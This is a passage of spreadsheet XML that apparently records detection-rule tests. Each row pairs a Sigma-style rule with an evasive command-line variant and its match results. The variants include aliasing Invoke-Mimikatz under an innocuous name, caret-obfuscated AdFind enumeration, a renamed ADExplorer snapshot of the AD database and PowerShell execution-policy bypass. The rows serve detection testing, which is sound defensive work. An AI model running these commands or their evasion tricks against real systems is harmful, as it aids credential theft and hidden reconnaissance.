      <c r="B959" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C959" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D959" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E959" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F959" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G959" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H959" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I9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59" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K959" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="960" ht="15.75" customHeight="1" s="42">
      <c r="A960" s="43" t="n"/>
      <c r="B960" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C960" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D960" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E960" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F960" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G960" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H960" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I96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0" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K960" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="961" ht="15.75" customHeight="1" s="42">
      <c r="A961" s="43" t="n"/>
      <c r="B961" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C961" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D961" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E961" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmand "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F961" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G961" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H961" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I96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1" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K961" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="962" ht="15.75" customHeight="1" s="42">
      <c r="A962" s="43" t="n"/>
      <c r="B962" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C962" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D962" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E962" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -COmmaND "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F962" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G962" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H962" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I9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2" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K962" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="963" ht="15.75" customHeight="1" s="42">
      <c r="A963" s="36" t="n"/>
      <c r="B963" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C963" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D963" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E963" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F963" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G963" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H963" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I96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3" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K963" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="964" ht="15.75" customHeight="1" s="42">
      <c r="A964" s="43" t="n"/>
      <c r="B964" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C964" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D964" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E964" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmanD "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F964" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G964" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H964" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I9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4" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K964" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="965" ht="15.75" customHeight="1" s="42">
      <c r="A965" s="43" t="n"/>
      <c r="B965" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C965" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D965" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E965" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaNd "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F965" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G965" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H965" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I96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965" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K965" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="966" ht="15.75" customHeight="1" s="42">
      <c r="A966" s="43" t="n"/>
      <c r="B966" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_adfind_susp_usage</t>
        </is>
      </c>
      <c r="C966" s="36" t="inlineStr">
        <is>
          <t>PUA - AdFind Suspicious Execution</t>
        </is>
      </c>
      <c r="D966" s="36" t="inlineStr">
        <is>
          <t>9a132afa-654e-11eb-ae93-0242ac130002</t>
        </is>
      </c>
      <c r="E966" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" adfind.exe d^o^m^a^i^n^l^i^s^t</t>
        </is>
      </c>
      <c r="F966" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G966" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H966" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I966" s="36" t="inlineStr">
        <is>
          <t>PUA - AdFind Suspicious Execution (9a132afa-654e-11eb-ae93-0242ac130002); Renamed AdFind Execution (df55196f-f105-44d3-a675-e9dfb6cc2f2b)</t>
        </is>
      </c>
      <c r="J966" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K966" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="967" ht="15.75" customHeight="1" s="42">
      <c r="A967" s="43" t="n"/>
      <c r="B967" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_execution</t>
        </is>
      </c>
      <c r="C967" s="36" t="inlineStr">
        <is>
          <t>Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D967" s="36" t="inlineStr">
        <is>
          <t>9212f354-7775-4e28-9c9f-8f0a4544e664</t>
        </is>
      </c>
      <c r="E967" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Start-Process -FilePath 'ADExplorer.exe' -ArgumentList '/passive /log:C:\temp\adexplorer.log'"</t>
        </is>
      </c>
      <c r="F967" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G967" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H967" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I967" s="43" t="n"/>
      <c r="J967" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K967" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="968" ht="15.75" customHeight="1" s="42">
      <c r="A968" s="43" t="n"/>
      <c r="B968" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_execution</t>
        </is>
      </c>
      <c r="C968" s="36" t="inlineStr">
        <is>
          <t>Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D968" s="36" t="inlineStr">
        <is>
          <t>9212f354-7775-4e28-9c9f-8f0a4544e664</t>
        </is>
      </c>
      <c r="E968" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Start-Process -FilePath 'ADExplorer.exe' -ArgumentList '/passive /log:C:\temp\adexplorer.log'"</t>
        </is>
      </c>
      <c r="F968" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G968" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H968" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I968" s="43" t="n"/>
      <c r="J968" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K968" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="969" ht="15.75" customHeight="1" s="42">
      <c r="A969" s="43" t="n"/>
      <c r="B969" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_execution</t>
        </is>
      </c>
      <c r="C969" s="36" t="inlineStr">
        <is>
          <t>Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D969" s="36" t="inlineStr">
        <is>
          <t>9212f354-7775-4e28-9c9f-8f0a4544e664</t>
        </is>
      </c>
      <c r="E969" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAND "Start-Process -FilePath 'ADExplorer.exe' -ArgumentList '/passive /log:C:\temp\adexplorer.log'"</t>
        </is>
      </c>
      <c r="F969" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G969" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H969" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I969" s="43" t="n"/>
      <c r="J969" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K969" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="970" ht="15.75" customHeight="1" s="42">
      <c r="A970" s="43" t="n"/>
      <c r="B970" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_execution</t>
        </is>
      </c>
      <c r="C970" s="36" t="inlineStr">
        <is>
          <t>Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D970" s="36" t="inlineStr">
        <is>
          <t>9212f354-7775-4e28-9c9f-8f0a4544e664</t>
        </is>
      </c>
      <c r="E970" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -commAnD "Start-Process -FilePath 'ADExplorer.exe' -ArgumentList '/passive /log:C:\temp\adexplorer.log'"</t>
        </is>
      </c>
      <c r="F970" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G970" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H970" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I970" s="36" t="n"/>
      <c r="J970" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K970" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="971" ht="15.75" customHeight="1" s="42">
      <c r="A971" s="43" t="n"/>
      <c r="B971" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_execution</t>
        </is>
      </c>
      <c r="C971" s="36" t="inlineStr">
        <is>
          <t>Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D971" s="36" t="inlineStr">
        <is>
          <t>9212f354-7775-4e28-9c9f-8f0a4544e664</t>
        </is>
      </c>
      <c r="E971" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMMand "Start-Process -FilePath 'ADExplorer.exe' -ArgumentList '/passive /log:C:\temp\adexplorer.log'"</t>
        </is>
      </c>
      <c r="F971" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G971" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H971" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I971" s="36" t="n"/>
      <c r="J971" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K971" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="972" ht="15.75" customHeight="1" s="42">
      <c r="A972" s="43" t="n"/>
      <c r="B972" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_execution</t>
        </is>
      </c>
      <c r="C972" s="36" t="inlineStr">
        <is>
          <t>Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D972" s="36" t="inlineStr">
        <is>
          <t>9212f354-7775-4e28-9c9f-8f0a4544e664</t>
        </is>
      </c>
      <c r="E972" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -command "Start-Process -FilePath 'ADExplorer.exe' -ArgumentList '/passive /log:C:\temp\adexplorer.log'"</t>
        </is>
      </c>
      <c r="F972" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G972" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H972" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I972" s="36" t="n"/>
      <c r="J972" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K972" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="973" ht="15.75" customHeight="1" s="42">
      <c r="A973" s="43" t="n"/>
      <c r="B973" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_susp_execution</t>
        </is>
      </c>
      <c r="C973" s="36" t="inlineStr">
        <is>
          <t>Suspicious Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D973" s="36" t="inlineStr">
        <is>
          <t>ef61af62-bc74-4f58-b49b-626448227652</t>
        </is>
      </c>
      <c r="E973" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\rundll32.exe C:\Windows\System32\advapi32.dll SomeFunction</t>
        </is>
      </c>
      <c r="F973" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G973" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H973" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I973" s="36" t="inlineStr">
        <is>
          <t>Potential WinAPI Calls Via CommandLine (ba3f5c1b-6272-4119-9dbd-0bc8d21c2702); Potential WinAPI Calls Via CommandLine (ba3f5c1b-6272-4119-9dbd-0bc8d21c2702)</t>
        </is>
      </c>
      <c r="J973" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K973" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="974" ht="15.75" customHeight="1" s="42">
      <c r="A974" s="43" t="n"/>
      <c r="B974" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_susp_execution</t>
        </is>
      </c>
      <c r="C974" s="36" t="inlineStr">
        <is>
          <t>Suspicious Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D974" s="36" t="inlineStr">
        <is>
          <t>ef61af62-bc74-4f58-b49b-626448227652</t>
        </is>
      </c>
      <c r="E974" s="36" t="inlineStr">
        <is>
          <t>cmd /"c" "copy C:\Tools\ADExplorer64.exe C:\Windows\System32\sysinfo.exe &amp;&amp; C:\Windows\System32\sysinfo.exe -snapshot C:\PerfLogs\ad.db"</t>
        </is>
      </c>
      <c r="F974" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G974" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H974" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I974" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J974" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K974" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="975" ht="15.75" customHeight="1" s="42">
      <c r="A975" s="43" t="n"/>
      <c r="B975" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_susp_execution</t>
        </is>
      </c>
      <c r="C975" s="36" t="inlineStr">
        <is>
          <t>Suspicious Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D975" s="36" t="inlineStr">
        <is>
          <t>ef61af62-bc74-4f58-b49b-626448227652</t>
        </is>
      </c>
      <c r="E975" s="36" t="inlineStr">
        <is>
          <t>cmd -"c" "copy C:\Tools\ADExplorer64.exe C:\Windows\System32\sysinfo.exe &amp;&amp; C:\Windows\System32\sysinfo.exe -snapshot C:\PerfLogs\ad.db"</t>
        </is>
      </c>
      <c r="F975" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G975" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H975" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I975" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J975" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K975" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="976" ht="15.75" customHeight="1" s="42">
      <c r="A976" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B976" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_discovery_via_reg_queries</t>
        </is>
      </c>
      <c r="C976" s="36" t="inlineStr">
        <is>
          <t>System Information Discovery via Registry Queries</t>
        </is>
      </c>
      <c r="D976" s="36" t="inlineStr">
        <is>
          <t>0022869c-49f7-4ff2-ba03-85ac42ddac58</t>
        </is>
      </c>
      <c r="E976" s="36" t="inlineStr">
        <is>
          <t>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\" /v CurrentBuildNumber</t>
        </is>
      </c>
      <c r="F976" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G976" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H976" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I976" s="43" t="inlineStr">
        <is>
          <t>System Information Discovery via Registry Queries (0022869c-49f7-4ff2-ba03-85ac42ddac58)</t>
        </is>
      </c>
      <c r="J976" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K976" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="977" ht="15.75" customHeight="1" s="42">
      <c r="A977" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B977" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_discovery_via_reg_queries</t>
        </is>
      </c>
      <c r="C977" s="36" t="inlineStr">
        <is>
          <t>System Information Discovery via Registry Queries</t>
        </is>
      </c>
      <c r="D977" s="36" t="inlineStr">
        <is>
          <t>0022869c-49f7-4ff2-ba03-85ac42ddac58</t>
        </is>
      </c>
      <c r="E977" s="36" t="inlineStr">
        <is>
          <t>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v""CurrentBuildNumber</t>
        </is>
      </c>
      <c r="F977" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G977" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H977" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I977" s="43" t="inlineStr">
        <is>
          <t>System Information Discovery via Registry Queries (0022869c-49f7-4ff2-ba03-85ac42ddac58)</t>
        </is>
      </c>
      <c r="J977" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K977" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="978" ht="15.75" customHeight="1" s="42">
      <c r="A978" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B978" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_discovery_via_reg_queries</t>
        </is>
      </c>
      <c r="C978" s="36" t="inlineStr">
        <is>
          <t>System Information Discovery via Registry Queries</t>
        </is>
      </c>
      <c r="D978" s="36" t="inlineStr">
        <is>
          <t>0022869c-49f7-4ff2-ba03-85ac42ddac58</t>
        </is>
      </c>
      <c r="E978" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion' | Select-Object -ExpandProperty CurrentBuildNumber"</t>
        </is>
      </c>
      <c r="F978" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G978" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H978" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I978" s="43" t="n"/>
      <c r="J978" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K978" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="979" ht="15.75" customHeight="1" s="42">
      <c r="A979" s="43" t="n"/>
      <c r="B979" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C979" s="36" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D979" s="36" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E979" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\rundll32.exe C:\Windows\Temp\legit.dll,#1</t>
        </is>
      </c>
      <c r="F979" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G979" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H979" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I979" s="43" t="n"/>
      <c r="J979" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K979" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="980" ht="15.75" customHeight="1" s="42">
      <c r="A980" s="43" t="n"/>
      <c r="B980" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C980" s="36" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D980" s="36" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E980" s="36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980" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G980" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H980" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I980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980" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K980" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="981" ht="15.75" customHeight="1" s="42">
      <c r="A981" s="43" t="n"/>
      <c r="B981" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C981" s="36" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D981" s="36" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E981" s="36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981" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G981" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H981" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I981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981" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K981" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="982" ht="15.75" customHeight="1" s="42">
      <c r="A982" s="43" t="n"/>
      <c r="B982" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C982" s="36" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D982" s="36" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E982" s="36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982" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G982" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H982" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I982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982" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K982" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="983" ht="15.75" customHeight="1" s="42">
      <c r="A983" s="43" t="n"/>
      <c r="B983" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C983" s="36" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D983" s="36" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E983" s="36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983" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G983" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H983" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I983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983" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K983" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="984" ht="15.75" customHeight="1" s="42">
      <c r="A984" s="43" t="n"/>
      <c r="B984" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C984" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D984" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E984" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F984" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G984" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H984" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I984" s="43" t="n"/>
      <c r="J984" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K984" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="985" ht="15.75" customHeight="1" s="42">
      <c r="A985" s="43" t="n"/>
      <c r="B985" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C985" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D985" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E985" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F985" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G985" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H985" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I985" s="43" t="n"/>
      <c r="J985" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K985" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="986" ht="15.75" customHeight="1" s="42">
      <c r="A986" s="43" t="n"/>
      <c r="B986" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C986" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D986" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E986" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F986" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G986" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H986" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I986" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J986" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K986" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="987" ht="15.75" customHeight="1" s="42">
      <c r="A987" s="43" t="n"/>
      <c r="B987" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C987" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D987" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E987" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
